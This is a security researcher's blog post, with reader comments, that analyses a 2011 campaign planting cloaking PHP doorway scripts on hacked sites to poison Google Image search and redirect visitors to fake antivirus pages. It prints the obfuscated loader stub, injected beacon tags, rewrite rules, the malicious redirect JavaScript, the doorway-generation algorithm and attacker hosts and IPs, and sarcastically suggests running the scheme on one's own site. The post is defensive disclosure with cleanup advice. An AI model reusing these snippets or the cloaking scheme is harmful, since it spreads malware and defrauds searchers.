msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Thousands of Hacked Sites Seriously Poison Google Image Search Results

   05 May 11   Filed in Website exploits

This investigation began a few weeks ago, when I came across the following two threads in website security forums:

[badwarebusters.org] Lately I have been seeing a huge increase in the number of hacked sites appearing on google image search results that redirect to a fake Av scanner. more »»

[Google Webmaster Help] google image search results often has multiple infected / malware sites on the first SERP page. more »»

This is a well known problem. I blogged about such SEO poisoning attacks several times here. This time I decided to check what’s behind the reported increase in malicious image search results.

The attack uses cloaking to feed keyword-rich pages with hot-linked images to search engine bots and return a malicious JavaScript that redirects to fake AV sites to visitors that come from search engines.

Here’s a screenshot of a typical Google Image search results page where I highlighted suspicious results Pink frame: the image is hot-linked, Red frame: the results is outright malicious and redirects to a fake AV site. (I wish Google had similar highlighting to warn unsuspecting searchers.)

My goal was to find out

  1. how the sites were compromised and what webmasters can do to prevent such infections
  2. and whether it was possible to identify all compromised sites and have Google remove hijacked search results from its index.

Imgaaa

I began with checking home pages of a few known hacked sites trying to find some common patterns. Quite soon I discovered the following code at the very bottom of most of them:

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Some alternative variants
<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">
or
<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>
Update (May 6th, 2011) or
<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=15433533">

The “imgaaa .net” domain didn’t resolve and the code looked suspicious so I decided to google for this imgaaa.

Quite soon I found this thread on WordPress support forum. It was the key to answering all my questions. I asked people to help with my investigation and they provided me with important internal information (e.g. .php files uploaded by hackers and some statistics). This information helped me reconstruct the whole scheme behind this attack, find thousands of infected sites and estimate the scale of the problem.

Update (May 6th, 2011): Some other domains on the same IP as imgaaa .net: imgbbb.net, imgccc .net, imgddd .net, ingeee .net.

Short description

1. Criminals use stolen FTP credentials to upload malicious .php files to compromised servers. (confirmed both by webmasters who found trojans on their computers and by hosting providers who found attack traces in FTP logs)

2. These files generate spammy web pages on-the-fly. As a keyword-rich content they use combination of top Google web search results and Image search results.

3. The generated spammy pages are interlinked to make sure Googlebot discovers them all. Moreover, they use Google’s suggested searches to generate links to new spammy pages (they will be generated on-the-fly when Googlebot follows the links). This simple scheme makes Google generate spam for its own index.

4. To have Google discover the spammy pages in the first place, criminals create blogs using free blogging services (e.g. http://blog.fc2.com/) where they post links to newly created spam-generating scripts on hacked sites.

5. Now the Google exploit in action: The combination of keywords from top Google search results for particular keywords and hot-linked images returned by Google Image search for the same keywords, makes the newly generated spammy pages appear at the top (the first page) of Google Image search results within a few days, hijacking results of sites that actually host (and usually own) the images.

This works like a charm. Exploiting this flaw, cybercriminals managed to hijack search results on the first pages of Google Image search for millions of keywords. I estimate that this trick generates at least 15 million clicks on poisoned image search results every months. (calculations and the detailed description of how this Google exploit works can be found below)

6. What makes this a security problem is what happens when people click on such hijacked search results. The rogue script detects a visitor that comes from search results and substitutes the spammy page with some malicious JavaScript (that in most cases redirects to fake AV sites).

Detailed reconstruction of the attack

Update (June 2011): After May 17th, the attack scheme has slightly changed. You can find description of the changes in the following post.

1. Uploading the PHP script.

Malicious hackers use stolen FTP login details to upload an obfuscated .php file to some directory on a server. They may upload several identical files with different names to different directories.

Here are the IP addresses that people usually find in FTP logs: 46.252.130.109 and 91.200.240.10.
Update (May 10th, 2011): Two comments mentioned one more IP: 91.200.241.200.

The .php script usually has a name that consists of either two random digits (e.g. 35.php) or three random letters (e.g. gmp.php).

The file contains about 11 Kb of an obfuscated code:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/ZmVSKRVBINtZbTiAR4Yd...skipped...wV/UO/k/6QMUUQ=='))); ?>

This file is responsible for generating spammy pages, pushing malicious content and uploading additional files to a server.

2. Preparation (alcobro)

Now the uploaded script should be registered and added to a network of compromised sites. To do so hackers make a request with the ?q=alcobro parameter.

This request prepares the hacked site. It creates the following directories:

/.log
/.log/compromiseddomain.com

where compromiseddomain.com is the domain name that I will use in this post as a replacement for the actual domain names of compromised sites.

Then it creates a file called /.log/compromiseddomain.com/xmlrpc.txt and writes the following line there: “bestnetblog.net“. This file contains the domain name of the remote server where the script can request a new malicious code from.

Then it tries to create an .htaccess file with the following content

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ script-name.php?q=$1 [L]
</IfModule>

where script-name.php is the path to the uploaded .php file (e.g. /wp-admin/26.php).

These rewrite rules define “SEO-friendly” links for doorway pages. Instead of hxxp://compromiseddomain.com/wp-admin/26.php?q=search-keywords the link will read as hxxp://compromiseddomain.com/wp-admin/search-keywords/

This .htaccess file is only created if doesn’t already exist. Otherwise, ?q=search-keywords links will be used.

and finally the script contacts
hxxp://bestnetblog .net//logdomain.php?q=compromiseddomain.com to let the criminals know that the compromiseddomain.com is ready to generate doorway pages.

Alternative maintenance requests

?dom100500=<domain.com> – this request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code.

Currently they use the following domain names: love-adamcom.net, love-adambiz.net, love-adamorg.net, love-adaminfo.net – all 184.82.169.171

?up100500=<some-value> – this request turns the script into an upload form.

On one compromised site they used this functionality to upload a web shell script called avuv.php.

Processing q requests

The main function of the script is to process ?q=search-keywords requests ( or /search-keywords in case of the appropriate .htaccess rules).

The script distinguishes three different situations:

  1. Request from a search engine bot (determined by the IP address ). In this case the script generates a keyword-rich page (see the algorithm below) and feeds it to the bot.
  2. Visitor that clicked on a search engine result on Google, Yahoo or Bing (determined by the referrer header). In this case the script returns a malicious JavaScript.
    Note 1: the malicious JavaScript is not returned if the search query contains the “site:” operator (to hide the malicious content from site owners and tools that rely on this operator)
    Note 2: the malicious JavaScript is always returned if your browser is Opera (even if you don’t come from a search engine)
  3. The rest requests are simply redirected to a homepage.

Perfect doorway generator (algorithm)

To generate a web page that can hijack image search results for a “search-keywords” query, the script does the following:

1. Get descriptions of top 50 Google web search results for “search keywords“.

2. Shuffle the words in those descriptions randomly to get some unique text.

The resulting text is not intelligible but it’s enough to exploit that Google’s flaw. Here’s an excerpt from a real spammy page that targets the “sarpagandha” keyword:

“It has been used since ages in Print e-mail ayurveda herb finder miscategorized Tablets, sarpagandha experts belongs Advice on ayurvedic medicines herbalsarpagandha Linn, family botanical name rauvolfia serpentina…”

3. Get top 20 Google Image search results for “search keywords” and extract links to image files.

4. Generate <img> tags for each extracted image link. E.g.

<img src="http://www.hijacked-site1.com/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

5. Shuffle the generated <img> tags (to change their order)

6. Break the generated in the step #2 text into sentences and mix them with the <img> tags. This will be a keyword-rich HTML code with hot-linked images for the “search keyword” query.

7. To facilitate discovery of new pages and to provide them with incoming links, each spammy page contains a section that links to 30 most recently generated doorway pages.

8. Get up to 10 suggested keyword from Google autocomplete and use them to generate links to doorway pages that target these suggested keywords. This way Google itself suggests what search keywords should be targeted. Spammers only need to come up with a few initial keyword — the rest Google will do itself.

9. At the bottom of each spammy block, there is a section of links to 6 alternative pages for the same “search keywords”. The links look like this:

<p><a href="http://compromiseddomain.com/search-keywords&page=2" title="Search Keywords">Search Keywords - Page 2</a> | ...skipped.... >Search Keywords - Page 7</a></p>

All those pages are generated the same way. The only difference is the page #2 takes image links from the second page of Google Image search results, the page #3 from the third page of image search results, and so on. The textual parts of these pages use absolutely the same words, only in a different (random) order.

10. Spammy block template. Then the algorithm concatenates all the generated parts into a single block that look like this:

<h1>SEARCH KEYWORDS</h1>
suggested links
links to 30 most recently generated links
keyword-rich text with hot-linked images
links to alternative pages

11. Spammy page template. So that this generated spammy block doesn’t look too outlandish, it is inserted in the middle of the HTML code a real homepage of the compromised site.

The HTML template is stored in the .log/compromiseddomain.com/shab100500.txt file. It’s basically the HTML code of the site’s homepage with the <REPLACEME> placeholder, that will be later replaced with a generated spammy block.

A few more important modification to this template will be made when the script generates spammy pages:

  • the original <title> tag is replaced with <title>Search Keywords</title>
  • and the <meta name=”googlebot” content=”noarchive”> tag is inserted — that’s why you don’t see cached copies of the pages in Google search results, which definitely makes the problem diagnostic more difficult for webmasters. (Fortunately, they can still use the “Fetch as Googlebot” tool in Google Webmaster Tools)

Caching

Once the spammy page is generated, it is saved on disk so that all subsequent requests to the same page will be served directly from cache.

The cached pages are saved in the .log/compromiseddomain.com/ directory and have the following filenames:

The first page: .log/compromiseddomain.com/search-keywords.html
Page #N : .log/compromiseddomain.com/search-keywords.htmlN where N is a number from 2 to 7

Since the spammy pages are only generated for search engine bots, the number of cache files provides us with quite an accurate number of indexed spammy pages. (It is not always possible to come up with Google search queries that return only spammy pages and at the same time all spammy pages on a particular domain.)

I’ve checked cache directories on many hacked sites. I rarely saw less that 1,000 files there. Some sites even had more than 100,000 cache files created in less than three months.

Sidenote: The spammy pages are only generated when Googlebot tries to index them. Moreover, three Google’s services are utilized in the spam generation process. Effectively, Google generates spam that poisons its index itself! What an irony!

Malicious redirects.

Let’s get back to real people who click on poisoned image search results. When the script detects a victim (visitor from Google, Yahoo or Bing) it returns some malicious code instead of the requested spammy page.

This malicious code is stored in the .log/compromiseddomain.com/iog.txt file and looks like this

var url = "hxxp://wcwrwpea .cz.cc/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = url;} else document.location= url;

Note how it breaks out of the frames. Google’s Image search interstitial pages can’t stop the redirect.

This file is being updated every 30 minutes. Remember the xmlrpc.txt file that contains the address of the remote server? This is where this address is used.

Every 30 minutes the script pulls new malicious script from
hxxp://remote-server-from-xmlrpc-txt/badcompany.php?q=compromiseddomain.com/script-name.php

So far the only changes are the domain names of sites where the script redirects web surfers to. Here are just a few domains used in this attack:

oppuvjyz .cz.cc, sljngefn .cz.cc, qtmgqqxh .cz.cc, qeiskziv .cz.cc, jfdevxvo.cz.cc, zpggpimd .cz.cc, uywgxabe .cz.cc, hdmibzur .cz.cc, kjqxyxiu .cz.cc, wcwrwpea .cz.cc

These domains have a very short life time so security tools that rely on blacklists simply don’t have enough time to flag them and update their blacklists. That’s why Google’s Safe Browsing database that is used by many modern web browsers is of very little help here. Moreover Google even have hard time finding and blacklisting the malicious doorway pages on hacked sites. Less than 5% of them are currently flagged.

Note, although the doorway pages currently return malicious scripts that redirect to fake AV sites, they can easily change to any other type of JavaScript: it can be some browser exploit or a redirect some shady content (e.g. porn, pirated stuff, counterfeit drugs, gambling sites, etc).

Statistics and estimates

This scheme works extremely well for spammers. It exploits the flaw in Google Image search so well that the doorway pages inevitably make it to the first pages of image search results for almost every keyword combination that consist of at least a couple of words. Let me prove it with some numbers.

I have compiled a list of 5,000+ hacked sites (the list is incomplete) with millions of doorway pages. And I have a very long list of keywords targeted by the spammy pages. I tried to check more than a hundred of random Google Images searches from that list — for most of them (~90%) I found at least one hijacked search result on the first page. In about 50% of cases there were more than one poisoned search results within the top 20. For some keywords, poisoned search results occupied more than half positions on the first page of results. Results below top 20 were poisoned even more seriously.

And the main problem is not that cybercrooks managed to seriously poison Google Image search results but the fact that many people do click on such results results and get exposed to malicious content.

I’ve received logs from some hacked sites and can estimate the traffic Google sends to such doorway pages.

An average hacked site has ~1,000 indexed doorway pages.
There are 5,000+ hacked sites that I know of.
This gives us 5,000,000+ indexed doorway pages.
An average doorway page has 1 visitor from Google every 10 days.
So all doorway pages should have 500,000+ visits from Google every day
Or 15,000,000+ visits every month

Note, this probably is underestimation since I used numbers on the lower side.

Update (May 16th, 2011): I seem to be right about underestimation. Check this Trend Micro article and their numbers: ~ 3 million unique visitors from Google on the average day, 26+ million uniques in just the first 10 days of May (with a declining trend after May 5th, when Google started to actively blacklist doorway sites.)

And don’t forget that this is statistics of this particular SEO poisoning attack. There are currently at least a few more other similar active attacks that make things significantly worse.

Here’s a representative example: a small hacked Croatian site with PageRank 0. FTP logs showed that it had been hacked on March 18th. According to access logs, on March 19th Google started to index doorways pages. During the next 5 weeks it has indexed 27,200+ doorway pages on this site. During the same 5 weeks Google Image search has sent 140,000+ visitors to this small site. Very impressive, isn’t it?

The most efficient black hat trick ever

I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site. And you don’t actually need to hack someone else’s sites — you can implement this on your own site with similar results. Of course, you should be ready that someone reports your site to Google and they remove it from their index altogether, but you can still enjoy having thousands of visitors literally for free before this happens.

But don’t be late to the party! Many black hats already exploit this flaw in Google Image search. It may happen that most of Google Image search results will be hijacked and re-hijacked quite soon and normal people will simply stop using Google for image searches.

To Google

Google, I hope you hear my sarcasm. Is there any chance you’ll close this security hole?

I know, you can’t remove hot-linking sites from image search results altogether for numerous reasons (although it would definitely fix the problem), but you should consider some other steps that could mitigate the problem and you should do it ASAP!

Here are just a few ideas that come to my head:

  • Give some preference to sites that actually host image files. Don’t encourage image theft.
  • Improve cloaking and web spam (pages with unintelligible texts should not rank high!) detection.
  • Cooperate with the anti-malware team and have them scan fresh discovered pages that hot-link more than, say, three images. (I hope that malware scanners will eventually be able to detect malicious behavior on such doorway pages)

Meanwhile, I’m sending my list of 5,000+ hacked sites to Google’s web spam team and to their webmaster trends analysts. Hope, you’ll be able to make a good use of it and remove these doorways pages from search results.

To Webmasters

To make sure your site is not abused by cybercrooks you should:

  • regularly check what pages Google has indexed on your site
    • use the “site:” searches
    • check statistics in Google Webmaster Tools
  • Regularly check what search keywords people use to find your site. Google Analytics won’t help here as it only tracks data for your legitimate web pages.
    • Use search data in Google Webmaster Tools
    • Regularly check raw access logs or tools that analyze access logs (e.g. Webalizer)
  • Scan your server for suspicious files and directories. It’s a good idea to have some sort of integrity control or version control so that you can easily detect unauthorized changes.
  • Don’t save passwords in FTP programs. Change passwords every time you find malware on your computer.
  • Make sure your computer is free from malware. Use a reputable anti-virus tool and regularly update it.
  • Keep your operating system, web browser and all browser plugins (e.g. Java, Flash) up-to-date. This will help minimize risk of malware infections that may result in site password theft.

If your site happens to be one of the compromised sites that host malicious doorway pages:

  • Thoroughly scan your computer for malware
  • Once your computer is clean, change all site passwords (even for sites that don’t seem to be compromised yet). Don’t save passwords in FTP clients – most of them can’t protect your passwords from malware. Consider using password managers (like KeePass) that encrypt all data with a master password.
  • Use SFTP instead of FTP if possible.
  • Now remove the doorway .php script, .htaccess file with rewrite rules if it was created, the .log/ directory and all its content.
  • You should also scan your server for suspicious files that might have been uploaded to your server using the ?up100500 requests.

##

Did you ever come across Google Image search results that redirected to malicious sites? Maybe your site was a victim of a similar attack? Or maybe this flaw seriously affects your site because spammers hijack your search results in Google Image search?

Your comments and stories are welcome!

###

This post has made it to the news. You might want to read what journalists and security professionals have to say about this problem.

Related posts:

Reader's Comments (47)

  1. |

    My mother was looking for picasso paintings, and clicked on a spammy link that redirected her to a rogue AV. I see now why it happened. I had educted her on looking at the domain name to see if it was in some way related to the topic she was searching for, but in this case, it was. And it was the 3rd result in the search. Luckily, I showed her how to recognize a spammy site and ignore the “WARNINGS!!!” that they give. Hope Google fixes this soon.

    • |

      Indeed, it’s not that easy to tell whether some image result points to.

      I’ve created a Firefox addon that highlighted hot-linked image results and results that pointed to outright malicious sites (based on their URL pattern). You can see a screenshot of how this addon works in this post. I know it’s not perfect yet but it helped me a lot during the investigation. You can see at a glance all suspicious results. If Googlers had this addon on their computers they would definitely start to fix this ASAP – for some keywords I saw about 70% of red-framed thumbnails (poisoned search results)

      • |

        Denis,

        Do these images show as being “hot-linked”?

        http://www.google.com/search?tbm=isch&hl=en&source=hp&biw=1680&bih=886&q=site%3Asafeandsavvy.f-secure.com&gbv=2&aq=f&aqi=&aql=&oq=

        They are from F-Secure’s Safe and Savvy blog, a VIP WordPress.com site, and so the images are hosted at WordPress.com while the site is “f-secure.com”.

        How about sites that host images using Amazon’s cloud services, will those be detected as “hot-linked” by your add-on?

        Thanks!
        Sean

        • |

          Hi Sean,

          Sure, most of them are displayed with a pink frame since the domain name of the web-page doesn’t match the domain name of an image.

          But that’s OK since I created this addon to facilitate my own research. Pink frame is just a sign for me. The red frame is a much stronger signal and more accurate detection of malicious results (based on URL pattern analysis of doorway sites).

          I have some ideas on how to make this addon more usable for general public, though. But I’m still not sure whether it is worth it to publish this addon.

          • |

            Thanks for the info, Denis.

            Given that there are many legitimate hot-linking hosts, is it perhaps a bit too strong to use: “Don’t encourage image theft.”?

            I think that at least the ‘pink’ result addon would be useful for research. However Google adjusts their methods to combat Image SEO, I believe they’ll likely continue to index hot-linked images. (I hope that they highlight hot-linked images in the UI.)

            I’d imagine that the ‘red’ results will evolve over time, becoming either less effective, or a maintenance burden for you.

            Cheers,
            Sean

          • |

            Sean,

            > Given that there are many legitimate hot-linking hosts, is it perhaps a bit too strong to use: “Don’t encourage image theft.”?

            Here I’m talking about the situation when Google prefers hot-linking sites to the sites that actually host/own the image.

            So if there is an image siteA.com/image.jpg and some page on siteA.com/page1.html that exists for a long time and rank on the first page on Google Image search result (I guess, Google does it for a good reason).

            Here comes a new/small siteB.com and creates a page siteB.com/page2.html that hot-links siteA.com/image.jpg using some keyword optimization.

            Now Google display a thumbnail for siteA.com/image.jpg somewhere at the top of image search results, but since the are more than one page that contain that image, Google needs to choose only one of them. In about 80% (in my experience) Google will choose a small/new hot-linking site. Effectively, siteB hijacks image search results of reputable siteA.

            That’s why I say that Google should give some preference to sites that own the image, when it chooses which page to link a particular image search result to.

            I’m not talking about the competition between different images.

            > a maintenance burden for you

            That’s a very good point. Actually I’ve noticed some changes in the way Google Image search started to return images after I published my article. This change made my addon work inconsistently for some result sets.

            The addon relies on a format of search result pages that Google can change any moment and on URL patterns of doorway pages that can change too. That definitely sounds like a
            maintenance hell.

            Id prefer if Google redesigned the UI of image search results to make more information about search results available before people actually click on them.

  2. |

    [...] be plagued with malicious links.”Denis Sinegubko, a Russian malware researcher who has been studying the fake anti-virus campaigns, called this tactic “the most efficient black hat trick ever,” and said it is [...]

  3. |

    [...] You can read his full article here. [...]

  4. |

    I think Google should put a quick solution for us webmasters to be able top delete the spammed search result in their directory.

  5. |

    These kind of pages always pop-up at school when people use Google Images. It’s always happening now, and we can’t stop it.

    • |

      I hope the thing will improve. At least I can see significantly less hijacked image search results on the first pages since I published this blog post and sent my information to Google. And many sites with doorways have been blacklisted by Google since then. Of course it helps only if you use web browsers that use Safe Browsing data: Firefox, Safari and Google Chrome.

      I hope these changes won’t be temporarily and Google will be able to identify and remove malicious pages from its index.

  6. |

    Denis,

    Thanks for an excellent post. I wish I would have seen it earlier…. It helped me understand what had happened to many of my sites. I still have 2 problematic sites.
    On one site I found all three types of files (.log, .php and htaccess changes). I erased these files but the malware pages listed in Webmaster tools still bring me to my homepage and not a 404 error (I also posted this question in Webmaster forum but wasn’t sure if you would see it).
    On another site I have a different problem. In Webmaster tools I don’t have a list of problematic files but only this code:
    I added spaces to the URL. I didn’t find any of the three types of files in that domain. How do I get rid of the malware?
    Thanks again for your help!

    • |

      I partly answered your question in Webmaster forum.

      Regarding the rest sites. Consider posting their URL in the forum or send them directly to me.
      Sometimes hackers don’t create doorways pages on some compromised sites, but since Google finds the injected “imgaaa” code in index pages (index files in all directories may be infected), it can blacklist such sites. So make sure to find and remove such code.

  7. |

    Thanks Denis – the URL is http://www.projectstomake.com/

  8. |

    [...] słów kluczowych (ostatnio np. “Osama bin Laden“). Sytuacja jest poważna, z szacunków wynika, że miesięcznie na podstawione, złośliwe strony może być kierowanych aż 15 milionów [...]

  9. |

    Thank you for this post!
    I was thankfully on my FTP when I saw that weird .log folder being created, then the avast antivirus started to popup alterts with the malicious URL. I’ve found this post quickly and solved the problem. Thumbs up!

  10. |

    Hi Denis,

    I work at a school with a one-to-one program (a laptop for every student) and we have lately seen the number of viruses skyrocket in the past two weeks – usually the exact same virus, and it’s taken until today (thanks to your post) to figure out how it was being done and now all that’s left is how to prevent it.

    I’ve been doing research today and so far the most effective way to prevent the infection from searches is to disable JavaScript on your browser (unfortunately this presents numerous problems on other sites) and so some have suggested creating a WhiteList for trusted websites – a little better but doesn’t stop users from adding a non-suspicious site to the whitelist and getting infected.

    Unfortunately the school uses Internet Explorer which doesn’t support Exceptions to turning JavaScript off, so my question is, is there any way to prevent users from searching or clicking on infected search results in Internet Explorer? Is there an add-on/plugin, or any way to tell? Maybe a way to prevent the computer from being infected once you find that the result is malicious?

    Any more information on prevention would be excellent. Also, would you have an example of a search term I could use to attempt to infect one of our machines? We’re attempting to test our anti-virus at the same time, and anything else that will prevent these viruses.

    Thanks for an excellent post! :)

    • |

      Hi Corey,

      I only use IE for Windows upates on Win computers so I don’t know much about its advanced security features that could help here.

      For me, Firefox+NoScript is the best possible combination. Maybe you can make your school switch to Firefox. I guess it’s a good idea to teach students best practices of safe web browsing.

      Anyway, white-listing may work reasonably well for this particular attack that changed domain names of the malicious sites several times a day. Even is someone adds such a bad site into the white list by mistake, the chances that other user will be redirected to that site are very small.

      And if you have black lists, I suggest that block the entire .CC TLD. Too many attacks use this domain lately.

      To minimize risks of fakeAV installs, make sure to configure IE so that it doesn’t automatically launches downloaded executable files. It should always ask where you want to save something, and don’t allow automatic downloads. This way (I believe) you have a chance to stop undesired download. If you can’t do it, then Ctrl+Alt+Del and stop your browser process.

  11. |

    My website became affected today. Actually the attack happened on 5/3/2011 and I have removed the files.

    I have found no evidence in the FTP logs that something was uploaded. I also do not run any PHP scripting server. Is it possible there is a version using ASP?

    • |

      What files did you remove? That’s important.

      Since your server doesn’t support PHP, the attackers might have decided not to upload .php scripts. Instead they only injected the “imgddd” code into your existing index files. In this case, you won’t see any new file uploads in FTP logs, but you will see how they download index files and then upload them again, with a slightly changed file size.

      • |

        i just had the following code added to a number of index.htm and index.asp pages on my server

        So now I need to know how they managed to modify these pages. What string should I search for in my web server logs?

        thanks

        Matthew

        • |

          ok…. I can see that they went through the FTP with my username and password. THe offending IP address is 91.200.241.200 which is slightly different to what was previously mentioned.

          So basically the malware got into my PC and took my password from FileZilla FTP client.

  12. |

    [...] internet security researcher Denis Sinegubko looked in even more detail into it, highlighting the problem in this post on his blog. He says the [...]

  13. |

    Hey Guys

    We got affected the 4th of may.
    In the logs i can see 91.200.241.200 wich is from Greece downloaded the index files and then reuploaded them slight modified. Passwords etc are changed and files are cleaned. However wich worries me is that they somehow got the pass wich about 5 people had. So someone most likelly has some malware or a virus?

  14. |

    for me ip was 89.149.242.202.

    Malware attack on my site. Moreover I have lost almost all traffic from google. what to do becz of this.

    I have removed the infected files. How to regain the traffic.

  15. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  16. |

    [...] deseas más información, aquí tiene la fuente de información: Unmaskparasites.com       Seguridad badwarebusters, imagenes infectadas, robo [...]

  17. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  18. |

    [...] capturing a lot of user traffic. The kit being used in these attacks has already been well described, so I will not repeat that information here. Instead, what I hope to reveal are the various stages [...]

  19. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  20. |

    Hello

    Is there any chance to have your addon for rogue hunting? It would help so much!

    Thanks a lot.
    You can join me on the email left in the form

  21. |

    [...] to almost everywhere to do their job, it would be nice if they don’t get infected when they click on a Google image link (yes we block the drop sites – e.g. 184.82.169.171 – no matter what domain name happens [...]

  22. |

    Was trying the keyword ‘rathinirvedam’ and reached the below site which is no way related to the Malayalam Movie (Indian Regional Language Movie) and not having the image shown in the google result. Looks like this site is afffected:

    hxxp://sleepingrome .com/regioni/lazio/roma/rmbb130-139/rathinirvedam-stills

    • |

      Indeed this is on the the hacked sites. Actually that particular search returns poisoned results from a few more hacked sites.

  23. |

    I found the free Sandboxie protected my PC from this image redirect to fake AV sites …Microsoft Security Essentials just allowed the exploit to happen unfortunately.
    I now are reluctant to click on any Google images
    jp

  24. |

    Thanks for this post. I found this page after searching on Google with terms from deobfuscating code from a php script to answer a question over at StackOverflow.com.

    This seems to be spot on, as everything is correct, minus a few filenames. But the is what finally convinced me.

    Question at stackoverflow.com can be found at: http://stackoverflow.com/questions/6459116/client-website-compromised-found-a-strange-php-file-any-ideas

    • |

      Yep. That’s it. Some filenames (e.g. don.txt instead of shab100500.txt) indeed has recently changed (they use a new version of the script since about May 18th) and I’m going to review this new version in an upcoming blog post.

  25. |

    [...] http://krebsonsecurity.com/2011/05/scammers-swap-google-images-for-malware/http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-s… • http://infotech.srg.com/2011/05/google-image-search-virus-leads-to-av.html Share and [...]

  26. |

    I wanted to write an update to help those who have been hacked.
    My sites were hacked in May according to the method described in this article which helped me at the time solve the problem. I changed all of my passwords and did NOT save them in Filezilla which is the only program I used to upload files.
    Later on in June I was hacked again and found thousands of hacked files in 4 hosting accounts.
    In May most of the hacked files were in wp-admin. This time they were hidden in files that were deep in domains which made them more dfficult to find. Also, in most of the files there was a .php file with about 6 or 7 characters in the name – such as getodug.php(the previous time there was only 2 or 3 – so it was easier to find the hacked files). On the same date that the .php file was uploaded there was another file called map.html and a folder .log with thousands of html files. It was difficult to know which files were hacked so I hope this helps those who have to spend hours cleaning their sites as I did…

  27. |

    [...] Google News was redirecting users to malicious Java applets and Google Image search was poisoned for 6 months as [...]

  28. |

    Yes.what you have suggested will help white hat practioners as well as the website visitors.I have seen such sites and how to send the report to Google.It is for the search engines not to put in the first page the websites with cloaked pages.I have written a lot in our website blogs.

  29. |

    [...] want to read more about the difference way of hack and how to protect the server I’ve found this blog post from Unmask Parasites very valuable. Also, they have a video of Matt Cutts talking about [...]

  30. |

    I would like to point out that I have found similar files / gateway files placed on an instance of WordPress. I am not quite sure how these were written, perhaps there is an exploit in the cache plugin used or maybe there was an old gateway file written from an old timthumb.php (the gateway file itself) that was overlooked.

    I found similar files on a clients site and swept through to clean up. This weekend it seems that there was even more on another client site. I am trying to cover all the bases but I am unsure how these files were written onto the server.